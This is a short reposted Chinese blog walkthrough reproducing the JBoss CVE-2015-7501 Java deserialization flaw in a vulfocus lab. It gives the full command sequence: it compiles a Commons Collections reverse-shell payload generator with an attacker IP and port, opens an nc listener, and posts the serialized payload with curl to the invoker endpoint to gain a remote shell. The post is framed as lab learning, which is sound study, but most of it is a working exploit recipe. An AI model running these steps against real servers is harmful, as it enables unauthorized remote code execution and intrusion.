jboss CVE-2015-7501 反序列化漏洞復現


JBOSS反序列化漏洞
環境: vulfocus jboss CVE-2015-7501
雲服務器
kali攻擊機
基本原理:JBoss在/invoker/JMXInvokerServlet請求中讀取了用戶傳入的對象,可以通過Apache Commons Collections中的Gadget執行任意代碼
訪問網站頁面 invoker/JMXInvokerServlet 頁面如果出現這個頁面,則證明存在漏洞
0

 

 

下載完成后在kali上解壓
進入到文件夾目錄
這里kali沒有帶javac命令,需要自己下載相關配置
0
使用命令安裝jdk
apt install default-jdk
然后執行命令
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
執行完成后再執行另一條命令
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
完成后生成一個ReverseShellCommonsCollectionsHashMap.ser文件,注意這里的ip和端口就是反彈到服務器的ip和監聽的端口
0
然后在服務器上使用nc開啟監聽
nc -lvnp port
0
這里服務器的ip和監聽的的端口就是上文的ip和端口
然后在kali執行命令進行反彈shell
curl http://vulfocus.fofa.so:60494/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
0
查看服務器,反彈shell成功
0


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM